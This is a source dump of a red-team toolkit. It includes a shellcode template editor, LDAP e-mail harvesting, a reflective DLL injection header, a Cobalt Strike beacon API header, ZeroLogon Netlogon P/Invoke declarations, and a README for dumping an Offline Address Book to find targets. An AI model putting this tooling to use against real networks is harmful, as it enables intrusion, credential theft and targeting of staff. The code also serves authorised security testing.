25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/Tools/Squeak/Code.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Navigation;
14 | using System.Windows.Shapes;
15 | using System.IO;
16 |
17 | namespace Squeak
18 | {
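/// <summary>
/// Interaction logic for Code.xaml: loads the clrcode.cs template into the
/// editor control and writes the edited text back on save.
/// </summary>
public partial class Code : Page
{
    // Template file read on load and overwritten on save. The path is relative,
    // so it resolves against the process's current working directory.
    private const string TemplatePath = "clrcode.cs";

    // Token the template must contain before it may be saved.
    private const string HexPlaceholder = "[HEX]";

    public Code()
    {
        InitializeComponent();
    }

    /// <summary>
    /// Saves the editor text to the template file. Text that lacks the
    /// [HEX] placeholder is rejected with a message and nothing is written.
    /// </summary>
    private void CodeSave_Click(object sender, RoutedEventArgs e)
    {
        string newcode = RTB.Text;
        if (newcode == null || !newcode.Contains(HexPlaceholder))
        {
            MessageBox.Show("Code does not contain the [HEX] placeholder, please put this in.");
            return;
        }

        // A read-only file or an unwritable working directory used to surface
        // as an unhandled exception in the click handler; report it instead.
        try
        {
            File.WriteAllText(TemplatePath, newcode);
        }
        catch (IOException ex)
        {
            MessageBox.Show("Could not save " + TemplatePath + ": " + ex.Message);
        }
        catch (UnauthorizedAccessException ex)
        {
            MessageBox.Show("Could not save " + TemplatePath + ": " + ex.Message);
        }
    }

    /// <summary>
    /// Selects the C# highlighter and fills the editor from the template file.
    /// </summary>
    void Code_Loaded(object sender, RoutedEventArgs e)
    {
        RTB.CurrentHighlighter = AurelienRibon.Ui.SyntaxHighlightBox.HighlighterManager.Instance.Highlighters["CSharp"];

        // FileNotFoundException derives from IOException, so a missing template
        // is reported here rather than crashing the page while it loads.
        try
        {
            RTB.Text = File.ReadAllText(TemplatePath);
        }
        catch (IOException ex)
        {
            MessageBox.Show("Could not load " + TemplatePath + ": " + ex.Message);
        }
        catch (UnauthorizedAccessException ex)
        {
            MessageBox.Show("Could not load " + TemplatePath + ": " + ex.Message);
        }
    }
}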
61 | }
62 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/clsLDAP.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.DirectoryServices.AccountManagement;
4 | using System.Linq;
5 |
6 | namespace Sigwhatever
7 | {
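class ClsLDAP
{
    /// <summary>
    /// Returns the e-mail addresses of the members of a domain group.
    /// </summary>
    /// <param name="groupName">Group name, matched with IdentityType.Name.</param>
    /// <param name="domainName">Domain used to build the PrincipalContext.</param>
    /// <returns>
    /// The addresses found. The list is empty when the group does not exist and
    /// holds whatever was collected so far when a directory call fails.
    /// </returns>
    public List<string> EnumGroupEmails(string groupName, string domainName)
    {
        List<string> emails = new List<string>();
        try
        {
            using (PrincipalContext ctx = new PrincipalContext(ContextType.Domain, domainName))
            using (GroupPrincipal grp = GroupPrincipal.FindByIdentity(ctx, IdentityType.Name, groupName))
            {
                // FindByIdentity returns null for an unknown group; say so instead of
                // letting the dereference below raise a NullReferenceException.
                if (grp == null)
                {
                    Console.WriteLine("Error getting emails: group '" + groupName + "' not found");
                    return emails;
                }

                // GetMembers(true) is the recursive form, so nested groups are expanded.
                using (PrincipalSearchResult<Principal> members = grp.GetMembers(true))
                {
                    IEnumerable<string> sams = members
                        .Select(m => m.SamAccountName)
                        .Where(s => !String.IsNullOrEmpty(s))
                        .Distinct();

                    foreach (string sam in sams)
                    {
                        using (UserPrincipal usr = UserPrincipal.FindByIdentity(ctx, IdentityType.SamAccountName, sam))
                        {
                            // A member that is not a user resolves to null here; skip it
                            // rather than abort the whole enumeration.
                            if (usr == null || usr.EmailAddress == null)
                            {
                                continue;
                            }

                            Console.WriteLine("Adding " + usr.DisplayName + ": " + usr.EmailAddress);
                            emails.Add(usr.EmailAddress);
                        }
                    }
                }
            }
        }
        catch (Exception e)
        {
            // Best effort: report the failure and return what was gathered.
            Console.WriteLine("Error getting emails: " + e.Message);
        }
        return emails;
    }
}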
42 | }
43 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/SpoolTrigger.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/patch.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
/*
 * 1024-byte buffer that starts with the marker "PATCHME"; every byte after the
 * marker is zero. Elements not covered by a string initializer are
 * zero-initialized, so the explicit \0 padding is not needed to get that layout.
 * `volatile` makes each read go to the object instead of being folded from the
 * initializer at compile time.
 * NOTE(review): presumably the marker is located in the built binary and the
 * buffer overwritten by separate tooling - confirm against whatever consumes it.
 */
volatile char patchme[1024] = "PATCHME";
--------------------------------------------------------------------------------
/Tools/oab-parse/README.md:
--------------------------------------------------------------------------------
1 | OAB-Parse
2 | =========
3 |
4 | Purpose
5 | -------
6 | A utility for dumping an organisation's Global Address List (GAL) from its Offline Address Book (OAB).
7 | The tool will parse Outlook's `udetails.oab` file found in `%localappdata%\Microsoft\Outlook\"Offline Address Books"\`
8 | or full .lzx files obtained from Microsoft Exchange, and produce a CSV or JSON file for further processing.
9 |
10 | The GAL includes phone numbers, job descriptions, distribution list sizes and additional user data.
11 | This can be of use on Red Team jobs after establishing an initial foothold to identify
12 | additional targets, for onwards attacks or as back-up should the initial access fail.
13 |
14 |
15 | Installation
16 | ------------
17 |
18 | * Install the latest version of Python 3 (tested with 3.9 on Windows)
19 | * Change into the root directory of a copy of this repository
20 | * Create a virtual environment to keep the dependencies separate from other apps: `\Python39\python -m venv .venv`
21 | * Activate the virtual environment: `.venv\Scripts\activate` or `source .venv/bin/activate` on *nix
22 | * Install the dependencies: `pip install -r requirements.txt`
23 | * On non-Windows systems, libmspack must also be installed for .lzx file support, e.g. on Kali: `sudo apt-get install libmspack0`
24 |
25 | Usage
26 | -----
27 | The tool is CLI-based, with built-in help:
28 | ```
29 | (venv) C:\tools\oab-parse>python .\oab-parse.py --help
30 | Usage: oab-parse.py [OPTIONS] INFILE OUTFILE
31 |
32 | Parses Offline Address Books into text output.
33 |
34 | INFILE: Path to the udetails.oab or full .lzx file
35 | OUTFILE: The file to write to
36 |
37 | Options:
38 | --format [CSV|JSON] Output file format [default: CSV]
39 | --help Show this message and exit.
40 | ```
41 |
42 | It displays a progress bar whilst parsing the file:
43 |
44 | ```
45 | (venv) C:\tools\oab-parse>python oab-parse.py --format=CSV C:\Jobs\ABCD\udetails.oab C:\Jobs\ABCD\gal.csv
46 | Parsing 9570 records...
47 | [########################------------] 68% 00:00:02
48 |
49 | ```
50 |
51 | The resulting CSV file can be imported into Excel for filtering & searching.
52 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/SharpZeroLogon.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}
8 | Exe
9 | SharpZeroLogon
10 | SharpZeroLogon
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 | true
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Resources;
3 | using System.Runtime.CompilerServices;
4 | using System.Runtime.InteropServices;
5 | using System.Windows;
6 |
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("Squeak")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Squeak")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

//In order to begin building localizable applications, set
//<UICulture>CultureYouAreCodingWith</UICulture> in your .csproj file
//inside a <PropertyGroup>. For example, if you are using US english
//in your source files, set the <UICulture> to en-US. Then uncomment
//the NeutralResourceLanguage attribute below. Update the "en-US" in
//the line below to match the UICulture setting in the project file.

//[assembly: NeutralResourcesLanguage("en-US", UltimateResourceFallbackLocation.Satellite)]


[assembly: ThemeInfo(
    ResourceDictionaryLocation.None, //where theme specific resource dictionaries are located
                                     //(used if a resource is not found in the page,
                                     // or application resource dictionaries)
    ResourceDictionaryLocation.SourceAssembly //where the generic resource dictionary is located
                                              //(used if a resource is not found in the page,
                                              // app, or any theme specific resource dictionaries)
)]


// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both the assembly version and the file version are pinned to 1.0.0.0 here.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
56 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/beacon.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Beacon Object Files (BOF)
3 | * -------------------------
4 | * A Beacon Object File is a light-weight post exploitation tool that runs
5 | * with Beacon's inline-execute command.
6 | *
7 | * Cobalt Strike 4.1.
8 | */
9 |
/*
 * NOTE(review): this header uses DECLSPEC_IMPORT, BOOL, HANDLE,
 * PROCESS_INFORMATION and wchar_t but includes nothing itself, so the header
 * that defines them has to be included before this one.
 */

/* data API */
/* Cursor over an argument buffer; every BeaconData* function below takes one. */
typedef struct {
    char* original; /* the original buffer [so we can free it] */
    char* buffer; /* current pointer into our buffer */
    int length; /* remaining length of data */
    int size; /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void BeaconDataParse(datap* parser, char* buffer, int size);
DECLSPEC_IMPORT int BeaconDataInt(datap* parser);
DECLSPEC_IMPORT short BeaconDataShort(datap* parser);
DECLSPEC_IMPORT int BeaconDataLength(datap* parser);
DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size);

/* format API */
/* Same four fields as datap; every BeaconFormat* function below takes one. */
typedef struct {
    char* original; /* the original buffer [so we can free it] */
    char* buffer; /* current pointer into our buffer */
    int length; /* remaining length of data */
    int size; /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void BeaconFormatAlloc(formatp* format, int maxsz);
DECLSPEC_IMPORT void BeaconFormatReset(formatp* format);
DECLSPEC_IMPORT void BeaconFormatFree(formatp* format);
DECLSPEC_IMPORT void BeaconFormatAppend(formatp* format, char* text, int len);
DECLSPEC_IMPORT void BeaconFormatPrintf(formatp* format, char* fmt, ...);
DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size);
DECLSPEC_IMPORT void BeaconFormatInt(formatp* format, int value);

/* Output Functions */
/* Presumably the values accepted by the `type` argument of the two functions below - confirm. */
#define CALLBACK_OUTPUT 0x0
#define CALLBACK_OUTPUT_OEM 0x1e
#define CALLBACK_ERROR 0x0d
#define CALLBACK_OUTPUT_UTF8 0x20

/* Both fmt parameters in this header are printf-style and variadic; passing
 * data that is not a trusted literal as fmt is a format-string hazard. */
DECLSPEC_IMPORT void BeaconPrintf(int type, char* fmt, ...);
DECLSPEC_IMPORT void BeaconOutput(int type, char* data, int len);

/* Token Functions */
/* NOTE(review): in C an empty parameter list `()` leaves the parameters
 * unspecified; `(void)` would let the compiler reject stray arguments. */
DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void BeaconRevertToken();
DECLSPEC_IMPORT BOOL BeaconIsAdmin();

/* Spawn+Inject Functions */
/* Every length below is a signed int paired with a raw pointer; nothing in the
 * declarations ties the two together, so callers own the bounds. */
DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char* buffer, int length);
DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len);
DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len);
DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL toWideChar(char* src, wchar_t* dst, int max);
62 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Netapi32.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SharpZeroLogon
5 | {
// P/Invoke surface for three netapi32.dll exports, plus the enum and structs
// their signatures use. Nothing here has logic; it only describes native layouts.
// Detection note (review): these I_Net* names are internal exports rather than
// part of the documented Win32 API, so a user-mode binary that imports or
// resolves them is presumably uncommon - verify against your own baseline
// before alerting on it.
internal class Netapi32
{
    // Secure channel type passed as AccountType to the calls below (values 0-6).
    public enum NETLOGON_SECURE_CHANNEL_TYPE : int
    {
        NullSecureChannel = 0,
        MsvApSecureChannel = 1,
        WorkstationSecureChannel = 2,
        TrustedDnsDomainSecureChannel = 3,
        TrustedDomainSecureChannel = 4,
        UasServerSecureChannel = 5,
        ServerSecureChannel = 6
    }

    // 516-byte explicit layout. Only two fields are declared: a ushort at
    // offset 0 and a uint at offset 512; the bytes in between have no managed
    // field and stay at their default (zero) unless written through raw memory.
    [StructLayout(LayoutKind.Explicit, Size = 516)]
    public struct NL_TRUST_PASSWORD
    {
        [FieldOffset(0)]
        public ushort Buffer;

        [FieldOffset(512)]
        public uint Length;
    }

    // 12-byte explicit layout: the credential at offset 0, the timestamp at offset 8.
    [StructLayout(LayoutKind.Explicit, Size = 12)]
    public struct NETLOGON_AUTHENTICATOR
    {
        [FieldOffset(0)]
        public NETLOGON_CREDENTIAL Credential;

        [FieldOffset(8)]
        public uint Timestamp;
    }

    // Declared with a single sbyte field and sequential layout.
    [StructLayout(LayoutKind.Sequential)]
    public struct NETLOGON_CREDENTIAL
    {
        public sbyte data;
    }

    // All three imports use StdCall and marshal strings as Unicode. They return
    // an int; presumably a status code - confirm against the caller.
    [DllImport("netapi32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)]
    public static extern int I_NetServerReqChallenge(
        string PrimaryName,
        string ComputerName,
        ref NETLOGON_CREDENTIAL ClientChallenge,
        ref NETLOGON_CREDENTIAL ServerChallenge
    );

    [DllImport("netapi32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)]
    public static extern int I_NetServerAuthenticate2(
        string PrimaryName,
        string AccountName,
        NETLOGON_SECURE_CHANNEL_TYPE AccountType,
        string ComputerName,
        ref NETLOGON_CREDENTIAL ClientCredential,
        ref NETLOGON_CREDENTIAL ServerCredential,
        ref ulong NegotiateFlags
    );

    // ReturnAuthenticator is an out parameter; the other struct arguments are passed by ref.
    [DllImport("netapi32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)]
    public static extern int I_NetServerPasswordSet2(
        string PrimaryName,
        string AccountName,
        NETLOGON_SECURE_CHANNEL_TYPE AccountType,
        string ComputerName,
        ref NETLOGON_AUTHENTICATOR Authenticator,
        out NETLOGON_AUTHENTICATOR ReturnAuthenticator,
        ref NL_TRUST_PASSWORD ClearNewPassword
    );
}
75 | }
76 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ReflectiveDllInjection.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include
33 |
// we declare some common stuff in here...

// NOTE(review): meaning of the value 6 is not shown in this header; presumably
// a reason code passed to the DLL entry point - confirm at the use site.
#define DLL_QUERY_HMODULE 6

// Each DEREF* macro reinterprets `name` as a pointer to the given width and
// dereferences it. The expansions are not wrapped in outer parentheses, so an
// operator that binds tighter than unary * (for example a postfix ++ or [])
// written after the macro applies to the cast pointer, not to the loaded value.
// No alignment or bounds check is made on the address.
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)

// Function-pointer types: a no-argument WINAPI function returning ULONG_PTR,
// and a WINAPI function with the (HINSTANCE, DWORD, LPVOID) entry-point shape.
typedef ULONG_PTR(WINAPI* REFLECTIVELOADER)(VOID);
typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID);

// Marks a symbol for export from the DLL.
#define DLLEXPORT __declspec( dllexport )
48 |
49 | //===============================================================================================//
50 | #endif
51 | //===============================================================================================//
52 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
namespace Squeak.Properties {
    using System;


    /// <summary>
    /// A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {

        // Lazily created by the ResourceManager getter below.
        private static global::System.Resources.ResourceManager resourceMan;

        // Culture override set through the Culture property; null until assigned.
        private static global::System.Globalization.CultureInfo resourceCulture;

        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }

        /// <summary>
        /// Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                // Created on first access for the "Squeak.Properties.Resources"
                // base name in this assembly; the check-then-assign is not locked.
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Squeak.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }

        /// <summary>
        /// Overrides the current thread's CurrentUICulture property for all
        /// resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
    }
}
64 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/HTTPCap.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Text;
4 | using System.Collections;
5 | using System.Collections.Generic;
6 | using System.Text.RegularExpressions;
7 |
8 | namespace Sigwhatever
9 | {
10 | class HTTPCap
11 | {
// Process-wide state shared by everything in this class; all of it is public
// and mutable.

// Session tables wrapped with Hashtable.Synchronized.
public static Hashtable smbSessionTable = Hashtable.Synchronized(new Hashtable());
public static Hashtable httpSessionTable = Hashtable.Synchronized(new Hashtable());
// NOTE(review): `new List()` has no type argument and System.Collections.Generic.List
// is generic only, so this line does not compile as shown; the type arguments
// look to have been lost from this listing. Unlike the two tables above, this
// list is not wrapped in a synchronized collection.
public static IList outputList = new List();
public static bool consoleOutput = true;
public static bool enabledInspect = false;
public static bool enabledProxy = false;
// Captured once, at type initialisation, from the process's working directory.
public static string argFileOutputDirectory = Directory.GetCurrentDirectory();
public static string argFilePrefix = "Log";
// Generated once at type initialisation: ten upper-case letters from
// RandomString. Doit prints it as the "Encryption Password", so its strength is
